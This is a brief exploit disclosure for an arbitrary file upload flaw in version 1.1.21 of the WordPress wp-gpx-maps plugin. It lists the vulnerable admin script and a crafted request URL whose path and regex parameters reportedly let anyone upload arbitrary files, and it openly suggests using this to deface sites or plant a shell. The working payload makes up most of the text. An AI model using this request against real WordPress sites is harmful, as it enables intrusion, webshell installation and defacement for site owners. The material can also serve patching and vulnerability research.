WordPress wp-gpx-map version 1.1.21 Arbitrary File Upload Vulnerability

###########################################################

Vuln page : http://mysite.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php

exploit :

Go to url :

http://my-site.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php?realGpxPath=.&target_path=.&gpxRegEx=//

And you can upload what you want. You could change file path with target_path (deface, shell etc…)

#####################################################################

评论关闭。